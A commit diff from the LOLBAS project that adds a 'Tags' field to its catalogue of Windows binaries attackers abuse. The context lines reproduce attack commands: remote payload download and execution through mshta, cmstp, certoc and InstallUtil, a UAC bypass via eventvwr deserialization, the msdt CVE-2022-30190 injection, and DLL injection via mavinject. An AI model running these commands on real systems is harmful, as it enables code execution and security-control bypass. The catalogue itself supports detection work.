Adding tags (closes #9, #318) (#362)

* Adding various tags as a first iteration

* Adding quotes

* Adding 'Custom Format' properly

* Updating to key:value pairs

* Update template
This commit is contained in:
Wietze 2024-04-03 16:53:36 +01:00 committed by GitHub
parent a945bac6be
commit ebbf08ec4d
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
65 changed files with 229 additions and 66 deletions

View File

@ -20,6 +20,7 @@ jobs:
mv yml/OSBinaries yml/Binaries mv yml/OSBinaries yml/Binaries
mv yml/OSLibraries yml/Libraries mv yml/OSLibraries yml/Libraries
mv yml/OSScripts yml/Scripts mv yml/OSScripts yml/Scripts
rm -r yml/HonorableMentions
- name: Deploy to LOLBAS-Project.github.io repo - name: Deploy to LOLBAS-Project.github.io repo
uses: peaceiris/actions-gh-pages@v3 uses: peaceiris/actions-gh-pages@v3

View File

@ -57,6 +57,14 @@ mapping:
"OperatingSystem": "OperatingSystem":
type: str type: str
required: true required: true
"Tags":
type: seq
sequence:
- type: map
mapping:
regex;(^[A-Z]):
type: str
required: false
"Full_Path": "Full_Path":
type: seq type: seq
required: true required: true

View File

@ -13,6 +13,8 @@ Commands:
Privileges: Required privs Privileges: Required privs
MitreID: T1055 MitreID: T1055
OperatingSystem: Windows 10 1803, Windows 10 1703 OperatingSystem: Windows 10 1803, Windows 10 1703
Tags:
- Key1: Value1 # Optional field for one or more tags
- Command: The second command - Command: The second command
Description: Description of the second command Description: Description of the second command
Usecase: A description of the usecase Usecase: A description of the usecase

View File

@ -5,12 +5,14 @@ Author: 'Wade Hickey'
Created: 2020-12-02 Created: 2020-12-02
Commands: Commands:
- Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY> Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.
Usecase: Download file from Internet Usecase: Download file from Internet
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
Detection: Detection:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows Server 2022 OperatingSystem: Windows Server 2022
Tags:
- Execute: DLL
- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
Description: Downloads text formatted files Description: Downloads text formatted files
Usecase: Download scripts, webshells etc. Usecase: Download scripts, webshells etc.
@ -21,8 +23,6 @@ Commands:
Full_Path: Full_Path:
- Path: c:\windows\system32\certoc.exe - Path: c:\windows\system32\certoc.exe
- Path: c:\windows\syswow64\certoc.exe - Path: c:\windows\syswow64\certoc.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml
- IOC: Process creation with given parameter - IOC: Process creation with given parameter

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.003 MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Input: INF
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet. Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.003 MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Input: INF
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe

View File

@ -12,12 +12,14 @@ Commands:
MitreID: T1567 MitreID: T1567
OperatingSystem: Windows 10 OperatingSystem: Windows 10
- Command: ConfigSecurityPolicy.exe https://example.com/payload - Command: ConfigSecurityPolicy.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server Usecase: Downloads payload from remote server
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe - Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe

View File

@ -11,11 +11,11 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.002 MitreID: T1218.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\control.exe - Path: C:\Windows\System32\control.exe
- Path: C:\Windows\SysWOW64\control.exe - Path: C:\Windows\SysWOW64\control.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml

View File

@ -11,11 +11,11 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
Full_Path: Full_Path:
- Path: C:\Windows\System32\cscript.exe - Path: C:\Windows\System32\cscript.exe
- Path: C:\Windows\SysWOW64\cscript.exe - Path: C:\Windows\SysWOW64\cscript.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
Tags:
- Type: Compression
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
Description: Download and compress a remote file and store it in a cab file on local machine. Description: Download and compress a remote file and store it in a cab file on local machine.
Usecase: Download and compress into a cab file. Usecase: Download and compress into a cab file.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019 OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
Tags:
- Type: Compression
Full_Path: Full_Path:
- Path: c:\windows\system32\diantz.exe - Path: c:\windows\system32\diantz.exe
- Path: c:\windows\syswow64\diantz.exe - Path: c:\windows\syswow64\diantz.exe

View File

@ -11,11 +11,11 @@ Commands:
Privileges: DNS admin Privileges: DNS admin
MitreID: T1543.003 MitreID: T1543.003
OperatingSystem: Windows server OperatingSystem: Windows server
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\System32\Dnscmd.exe
- Path: C:\Windows\SysWOW64\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml
- IOC: Dnscmd.exe loading dll from UNC/arbitrary path - IOC: Dnscmd.exe loading dll from UNC/arbitrary path

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1548.002 MitreID: T1548.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Application: GUI
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
@ -18,6 +20,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1548.002 MitreID: T1548.002
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Application: GUI
Full_Path: Full_Path:
- Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\System32\eventvwr.exe
- Path: C:\Windows\SysWOW64\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe

View File

@ -28,8 +28,6 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\Expand.exe - Path: C:\Windows\System32\Expand.exe
- Path: C:\Windows\SysWOW64\Expand.exe - Path: C:\Windows\SysWOW64\Expand.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml

View File

@ -11,11 +11,11 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files\Internet Explorer\Extexport.exe
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml
- IOC: Extexport.exe loads dll and is execute from other folder the original path - IOC: Extexport.exe loads dll and is execute from other folder the original path

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream. Usecase: Extract data from cab file and hide it in an alternate data stream.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Description: Copy the source file to the destination file and overwrite it. Description: Copy the source file to the destination file and overwrite it.
Usecase: Download file from UNC/WEBDav Usecase: Download file from UNC/WEBDav

View File

@ -5,12 +5,14 @@ Author: 'Wade Hickey'
Created: 2020-03-05 Created: 2020-03-05
Commands: Commands:
- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache.
Usecase: Download file from Internet Usecase: Download file from Internet
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
Detection: Detection:

View File

@ -11,6 +11,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.004 MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE. Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting Usecase: Use to execute code and bypass application whitelisting
@ -18,13 +21,18 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.004 MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: InstallUtil.exe https://example.com/payload - Command: InstallUtil.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server Usecase: Downloads payload from remote server
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: jsc.exe /t:library Library.js - Command: jsc.exe /t:library Library.js
Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
Usecase: Compile attacker code on system. Bypass defensive counter measures. Usecase: Compile attacker code on system. Bypass defensive counter measures.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an alternate data stream Usecase: Hide data compressed into an alternate data stream
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Description: Download and compresses the target file and stores it in the target file. Description: Download and compresses the target file and stores it in the target file.
Usecase: Download file and compress into a cab file Usecase: Download file and compress into a cab file
@ -25,11 +29,11 @@ Commands:
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
Full_Path: Full_Path:
- Path: C:\Windows\System32\makecab.exe - Path: C:\Windows\System32\makecab.exe
- Path: C:\Windows\SysWOW64\makecab.exe - Path: C:\Windows\SysWOW64\makecab.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.013 MitreID: T1218.013
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
Usecase: Inject dll file into running process Usecase: Inject dll file into running process
@ -18,11 +20,11 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\mavinject.exe - Path: C:\Windows\System32\mavinject.exe
- Path: C:\Windows\SysWOW64\mavinject.exe - Path: C:\Windows\SysWOW64\mavinject.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation - IOC: mavinject.exe should not run unless APP-v is in use on the workstation

View File

@ -25,6 +25,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127.001 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: msbuild.exe project.proj - Command: msbuild.exe project.proj
Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
Usecase: Execute project file that contains XslTransformation tag parameters Usecase: Execute project file that contains XslTransformation tag parameters
@ -32,6 +34,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127.001 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: msbuild.exe @sample.rsp - Command: msbuild.exe @sample.rsp
Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
Usecase: Bypass command-line based detections Usecase: Bypass command-line based detections

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code bypass Application whitelisting Usecase: Execute code bypass Application whitelisting
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
- Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe" - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
Usecase: Execute code bypass Application allowlisting Usecase: Execute code bypass Application allowlisting
@ -25,6 +29,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
Full_Path: Full_Path:
- Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\System32\Msdt.exe
- Path: C:\Windows\SysWOW64\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.005 MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
Description: Executes VBScript supplied as a command line argument. Description: Executes VBScript supplied as a command line argument.
Usecase: Execute code Usecase: Execute code
@ -32,13 +34,17 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.005 MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
Tags:
